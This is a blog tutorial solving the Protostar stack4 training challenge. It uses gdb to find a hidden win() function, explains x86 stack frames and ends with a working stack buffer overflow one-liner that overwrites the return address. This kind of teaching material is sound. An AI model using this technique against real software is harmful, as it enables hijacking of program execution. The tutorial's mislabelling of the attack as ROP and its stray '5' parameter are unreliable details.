~couchNerd ~serialOutrager ~puts2In42 ~makesPigsFly

Practical Reverse Engineering Tutorials Part 2: Protostar Stack4

· by Shantanu Goel · Read in about 13 min · (2655 Words)
practical-reverse-engineering-tutorial-series reverse-engineering stack-buffer-overflow buffer-overflow gdb protostar

Table of Contents

About the challenge

In this article, we’ll go through the Protostar stack4 challenge. This would be a bit similar to the stack0 challenge that we already tackled earlier, but it will think about an interesting way to get alternate code to execute instead of just modifying data.

Pre-requisite: Make sure you’ve completed the Part 1 of the Practical Reverse Engineering Tutorials series. It’d also be great if you can try stack1-stack3 challenges on your own as they are similar to stack0.

Recon

Assuming you’ve done the setup as needed for Part 1 of this series, we straight away jump to run the challenge to see what we are after.

[email protected]:/opt/protostar/bin$ ./stack4
ABCD
[email protected]:/opt/protostar/bin$

So, we see that the program asks for some user input. When we input ‘ABCD’, nothing happens. That’s a bummer. We need to move to the static analysis to map out our next actions. Remember, it might be easier to look at the source code of the challenge (and it will also not give much away) but we’ll still try to avoid source code as much as possible to give more exercise to our brains.

Static Analysis

We first run our staple strings on the program to list interesting text data.

[email protected]:/opt/protostar/bin$ strings stack4
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
gets
puts
__libc_start_main
GLIBC_2.0
PTRh 
[^_]
code flow successfully changed
[email protected]:/opt/protostar/bin$ 

We see a potentially useful string code flow successfully changed straight away. I’d wager a guess that we’ve to get our currently dumb program to emit this string somehow. Let’s see what is the condition under which this string is being printed. So we bring out gdb like last time and check the disassembled code of main function.

[email protected]:/opt/protostar/bin$ gdb stack4 
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x08048408 <main+0>:	push   ebp
0x08048409 <main+1>:	mov    ebp,esp
0x0804840b <main+3>:	and    esp,0xfffffff0
0x0804840e <main+6>:	sub    esp,0x50
0x08048411 <main+9>:	lea    eax,[esp+0x10]
0x08048415 <main+13>:	mov    DWORD PTR [esp],eax
0x08048418 <main+16>:	call   0x804830c <[email protected]>
0x0804841d <main+21>:	leave  
0x0804841e <main+22>:	ret    
End of assembler dump.
(gdb) 

That’s interesting. So there’s no way main can print the string we’re after because there’s no print/puts call in here. Interestingly, main makes only one function call to gets to get user input and there’s no other function being called at all. This would mean that the string is being printed from somewhere else and our challenge is to get that code executed. We know from the previous challenge we solved that to print this string, the program would need to pass a pointer to it as a parameter to a output function (like puts). So to find that where this string is getting printed from, we’ve to first the address where this string is located and then search for reference to it.

You may know that there are various sections in an executable file. Generally, the executable portion is part of a section called .text and literal strings are part of a section called .rodata. So, our technique here would be to:

  • Get the section addresses (Using maintenance info sections gdb command)
  • Search for the string’s address in .rodata section (using find <section_start_address> <section_end_address> <string> gdb command)
  • Search for a reference to the string’s address in .text section (using find <section_start_address> <section_end_address> <string_address> gdb command)

This is shown below:

(gdb) maintenance info sections
Exec file:
    `/opt/protostar/bin/stack4', file type elf32-i386.
    0x8048114->0x8048127 at 0x00000114: .interp ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048128->0x8048148 at 0x00000128: .note.ABI-tag ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048148->0x804816c at 0x00000148: .note.gnu.build-id ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x804816c->0x8048198 at 0x0000016c: .hash ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048198->0x80481b8 at 0x00000198: .gnu.hash ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x80481b8->0x8048218 at 0x000001b8: .dynsym ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048218->0x8048267 at 0x00000218: .dynstr ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048268->0x8048274 at 0x00000268: .gnu.version ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048274->0x8048294 at 0x00000274: .gnu.version_r ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048294->0x804829c at 0x00000294: .rel.dyn ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x804829c->0x80482bc at 0x0000029c: .rel.plt ALLOC LOAD READONLY DATA HAS_CO---Type <return> to continue, or q <return> to quit---
NTENTS
    0x80482bc->0x80482ec at 0x000002bc: .init ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x80482ec->0x804833c at 0x000002ec: .plt ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x8048340->0x80484bc at 0x00000340: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x80484bc->0x80484d8 at 0x000004bc: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x80484d8->0x80484ff at 0x000004d8: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048500->0x8048504 at 0x00000500: .eh_frame ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8049504->0x804950c at 0x00000504: .ctors ALLOC LOAD DATA HAS_CONTENTS
    0x804950c->0x8049514 at 0x0000050c: .dtors ALLOC LOAD DATA HAS_CONTENTS
    0x8049514->0x8049518 at 0x00000514: .jcr ALLOC LOAD DATA HAS_CONTENTS
    0x8049518->0x80495e8 at 0x00000518: .dynamic ALLOC LOAD DATA HAS_CONTENTS
    0x80495e8->0x80495ec at 0x000005e8: .got ALLOC LOAD DATA HAS_CONTENTS
    0x80495ec->0x8049608 at 0x000005ec: .got.plt ALLOC LOAD DATA HAS_CONTENTS
    0x8049608->0x8049610 at 0x00000608: .data ALLOC LOAD DATA HAS_CONTENTS
    0x8049610->0x8049618 at 0x00000610: .bss ALLOC
    0x0000->0x0ad4 at 0x00000610: .stab READONLY HAS_CONTENTS
    0x0000->0x3bd2 at 0x000010e4: .stabstr READONLY HAS_CONTENTS
---Type <return> to continue, or q <return> to quit---
    0x0000->0x0039 at 0x00004cb6: .comment READONLY HAS_CONTENTS
(gdb) find 0x80484d8,0x80484ff,"code flow successfully changed"
0x80484e0
1 pattern found.
(gdb) x/s 0x80484e0
0x80484e0:	 "code flow successfully changed"
(gdb) find 0x8048340, 0x80484bc, 0x80484e0
0x80483fd <win+9>
1 pattern found.
(gdb) x/3i 0x80483fd
0x80483fd <win+9>:	loopne 0x8048383 <__do_global_dtors_aux+19>
0x80483ff <win+11>:	add    al,0x8
0x8048401 <win+13>:	call   0x804832c <[email protected]>
(gdb)

Thus we figure that the string is being called as part of a function called win as gdb shows. We can confirm this by disassembling win and this will also give us its address that we need to direct our code execution to.

(gdb) disassemble win
Dump of assembler code for function win:
0x080483f4 <win+0>:	push   ebp
0x080483f5 <win+1>:	mov    ebp,esp
0x080483f7 <win+3>:	sub    esp,0x18
0x080483fa <win+6>:	mov    DWORD PTR [esp],0x80484e0
0x08048401 <win+13>:	call   0x804832c <[email protected]>
0x08048406 <win+18>:	leave  
0x08048407 <win+19>:	ret    
End of assembler dump.
(gdb) 

So, we need to make our program start executing at 0x80483f4 (Entry point of function win) somehow.

A primer about X86 stack frames

Before continuing further, we will have to learn a bit about how program control works through stack frames. A stack frame is a region on the stack particular to a single function being executed in the call flow and represents its execution environment. If the same function is called many times, each instance of calling that function will have its own stack frame on the stack. A stack frame typically consists of:

  • Parameters passed to the function
  • Return address (Code location to jump to after the function is complete)
  • Pointer to the previous (Calling function’s) stack frame’s base
  • Local variables

Let’s see with the help of a small example how this works.

Sample Code
int foo(int a)
{
  int x = 2;
  int y = 3;
  x = a + x;
  return x;
}

int main()
{
  int a = 0;
  int b = 1;
  foo(a);
}

This will compile to the following assembly code

foo:
push   ebp
mov    ebp,esp
sub    esp,0x10
mov    DWORD PTR [ebp-0x8],0x2
mov    DWORD PTR [ebp-0x4],0x3
mov    eax,DWORD PTR [ebp+0x8]
add    DWORD PTR [ebp-0x8],eax
mov    eax,DWORD PTR [ebp-0x8]
leave
ret

main:
push   ebp
mov    ebp,esp
sub    esp,0x14
mov    DWORD PTR [ebp-0x8],0x0
mov    DWORD PTR [ebp-0x4],0x1
mov    eax,DWORD PTR [ebp-0x8]
mov    DWORD PTR [esp],eax
call   0x80483ed <foo>
leave
ret
Stack frame

Stack Frame of function foo

Important registers

The x86 registers that one would be most interested in while understanding stack frames are:

  • esp: Stack Pointer. Points to (Holds address of) the current top of the stack
  • ebp: Base Pointer. Points to (Holds address of) the base of the current stack frame
  • eip: Instruction Pointer. Points to (Holds address of) the next instruction to be executed in the program
Calling Convention / Function Parameters

In the x86 calling convention, the parameters being passed to a function and the return address are pushed onto the stack before calling it. This can be seen in the below instruction.

mov    DWORD PTR [esp],eax
call   0x80483ed <foo>

Here, the mov instruction is pushing the parameter ‘5’ onto the stack.

The call instruction is equivalent of pushing eip + 2 onto the stack and then jumping to the called function’s address. eip + 2 here points to the address of the instruction that should be executed next after returning from the called function.

Function Prologue / Entry Sequence

At the very beginning of a function, the first work done is to save the calling function’s base pointer (ebp) onto the stack and then move the current function’s base pointer to point towards calling function’s top. This can be seen in these instructions:

foo:
push   ebp
mov    ebp,esp
Local Variables

Then, space is created on the stack for holding any local variables.

sub    esp,0x10
Exit Sequence

Finally, after the function has executed, it returns by restoring the calling function’s base pointer and then popping the next value (return address) from stack into the eip.

leave
ret

Here, leave is equivalent of pop ebp to restore ebp value. ret is equivalent of pop eip to start executing the next instruction after the function call.

What we need to do

From the above analysis of the stack frame, we now know that:

  • Program flow is controlled through eip register
  • On returning from a called function, eip register is updated with a value (return address) from the stack
  • If we can somehow overflow a local variable on stack to modify the return address accurately, we can control the program execution.
  • Note that similar to the function foo, even the function main has its own stack frame and returns back to “something” after completing its execution. This “something” is the c library runtime against which the compiler linked the program. So we can even try to change execution path by modifying this return address.
Gotchas

In some explanations, you may see espmain/StackFramemain in the figure above should also include the parameter being passed to foo. However, I’ve excluded it here for the sake of avoiding confusion of overlapping stack frames.

Dynamic Analysis

Armed with our static analysis so far, we start our dynamic analysis. So, fire up gdb. We know that main code is like below:

0x08048408 <main+0>:	push   ebp
0x08048409 <main+1>:	mov    ebp,esp
0x0804840b <main+3>:	and    esp,0xfffffff0
0x0804840e <main+6>:	sub    esp,0x50
0x08048411 <main+9>:	lea    eax,[esp+0x10]
0x08048415 <main+13>:	mov    DWORD PTR [esp],eax
0x08048418 <main+16>:	call   0x804830c <[email protected]>
0x0804841d <main+21>:	leave  
0x0804841e <main+22>:	ret    
End of assembler dump.

We set breakpoints at few locations like below:

(gdb) b *0x08048408
Breakpoint 1 at 0x8048408: file stack4/stack4.c, line 12.
(gdb) b *0x08048411
Breakpoint 2 at 0x8048411: file stack4/stack4.c, line 15.
(gdb) b *0x08048418
Breakpoint 3 at 0x8048418: file stack4/stack4.c, line 15.
(gdb) b *0x0804841d
Breakpoint 4 at 0x804841d: file stack4/stack4.c, line 16.
(gdb) b *0x0804841e
Breakpoint 5 at 0x804841e: file stack4/stack4.c, line 16.

Now, we run the program till the first couple of breakpoints and analyze the registers/stack.

(gdb) r
Starting program: /opt/protostar/bin/stack4 

Breakpoint 1, main (argc=1, argv=0xbffff864) at stack4/stack4.c:12
12	stack4/stack4.c: No such file or directory.
	in stack4/stack4.c
(gdb) info r
eax            0xbffff864	-1073743772
ecx            0xb0a7a13f	-1331191489
edx            0x1	1
ebx            0xb7fd7ff4	-1208123404
esp            0xbffff7bc	0xbffff7bc
ebp            0xbffff838	0xbffff838
esi            0x0	0
edi            0x0	0
eip            0x8048408	0x8048408 <main>
eflags         0x200246	[ PF ZF IF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) c
Continuing.

Breakpoint 2, main (argc=1, argv=0xbffff864) at stack4/stack4.c:15
15	in stack4/stack4.c
(gdb) info r
eax            0xbffff864	-1073743772
ecx            0xb0a7a13f	-1331191489
edx            0x1	1
ebx            0xb7fd7ff4	-1208123404
esp            0xbffff760	0xbffff760
ebp            0xbffff7b8	0xbffff7b8
esi            0x0	0
edi            0x0	0
eip            0x8048411	0x8048411 <main+9>
eflags         0x200286	[ PF SF IF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) x/24x $esp
0xbffff760:	0xb7fd7ff4	0xb7ec6165	0xbffff778	0xb7eada75
0xbffff770:	0xb7fd7ff4	0x080495ec	0xbffff788	0x080482e8
0xbffff780:	0xb7ff1040	0x080495ec	0xbffff7b8	0x08048449
0xbffff790:	0xb7fd8304	0xb7fd7ff4	0x08048430	0xbffff7b8
0xbffff7a0:	0xb7ec6365	0xb7ff1040	0x0804843b	0xb7fd7ff4
0xbffff7b0:	0x08048430	0x00000000	0xbffff838	0xb7eadc76
(gdb) x/4x $ebp
0xbffff7b8:	0xbffff838	0xb7eadc76	0x00000001	0xbffff864
(gdb)

We can see that c runtime (or whatever it is that called the main function even if don’t want to get ourselves into what that is) has the base pointer (ebp) as 0xbffff838 and this is preserved at 0xbffff7b8. Then, main updates the current stack pointer (esp) as the new ebp of main. After that, main aligns its esp to 16 byte width, thus wasting 8 bytes and then reserves a further 0x50 (80) bytes for its stack. After all these operations, the salient characteristics of main’s stack frame are as below:

  • Current stack top (esp) is 0xbffff760
  • Current base pointer (ebp) is 0xbffff7b8
  • Main’s calling function’s ebp is 0xbffff838 and preserved at 0xbffff7b8
  • Main’s calling function’s return address is saved one word before the ebp (as we know as part of the call instruction of calling program). Thus return address is 0xb7eadc76 as we can see at location 0xbffff7bc (previous_ebp + 0x4 = 0xbffff7b8 + 0x4). This address 0xbffff7bc is the one that we want to overwrite with our intended address of win function so as to execute that instead of main’s caller function.

Now, run till the next breakpoint.

(gdb) c
Continuing.

Breakpoint 3, 0x08048418 in main (argc=1, argv=0xbffff864)
    at stack4/stack4.c:15
15	in stack4/stack4.c
(gdb) x $esp
0xbffff760:	0xbffff770
(gdb)

So we see that the pointer address for storing the input string from gets is located at 0xbffff770 (since the argument to gets is the buffer address and it is passed at the top of the stack as we know from previous section). We can see how far away this is from the address we want to overwrite by subtracting it:

0xbffff7bc - 0xbffff770 = 0x4C (or 76 bytes)

So, we know that the difference between our intended location and input buffer address is 76 bytes, so if we input 80 bytes, the 77th-80th bytes will overwrite the return address. We can now go for the win (pun intended) already but let’s continue further to our rest of the breakpoints to confirm our theory.

(gdb) c
Continuing.
12345678901234567890123456789012345678901234567890123456789012345678901234567890

Breakpoint 4, main (argc=0, argv=0xbffff864) at stack4/stack4.c:16
16	in stack4/stack4.c
(gdb) x/24x $esp
0xbffff760:	0xbffff770	0xb7ec6165	0xbffff778	0xb7eada75
0xbffff770:	0x34333231	0x38373635	0x32313039	0x36353433
0xbffff780:	0x30393837	0x34333231	0x38373635	0x32313039
0xbffff790:	0x36353433	0x30393837	0x34333231	0x38373635
0xbffff7a0:	0x32313039	0x36353433	0x30393837	0x34333231
0xbffff7b0:	0x38373635	0x32313039	0x36353433	0x30393837
(gdb) info r $ebp
ebp            0xbffff7b8	0xbffff7b8
(gdb) c
Continuing.

Breakpoint 5, 0x0804841e in main (argc=Cannot access memory at address 0x3635343b
) at stack4/stack4.c:16
16	in stack4/stack4.c
(gdb) info r $ebp
ebp            0x36353433	0x36353433
(gdb) 

We continue and enter an 80 byte long pattern and can see the repeated pattern visible on the stack and the last 4 bytes 7890 (0x30393837 in little endian hex format) have overwritten the address. We also see that if we stop after the leave instruction, the value 0x36353433 from address 0xbffff7b8 has been popped back into ebp.

Now, we find out the address of the win function and use its address as the last 4 bytes in an 80 byte input to the program to crack it.

(gdb) x win
0x80483f4 <win>:	0x83e58955
(gdb) quit
[email protected]:/opt/protostar/bin$ python -c 'print "A"*76+"\xf4\x83\x04\x08"' | ./stack4
code flow successfully changed
Segmentation fault
[email protected]:/opt/protostar/bin$ 

References / Lessons Learnt

In this article, we learnt:

  • Getting information about different sections of a program in gdb
  • Searching for values in a section of the program through gdb
  • Extending our knowledge of stack/buffer overflow to override program execution by manipulating return address (Also known as ROP or Return Oriented Programming attack)
  • About stack frames and esp/ebp/eip registers

You can refer to the below links for reading up more about some of the things discussed above. If you have any queries or suggestions, please leave a comment here or ping me @shantanugoel

Comments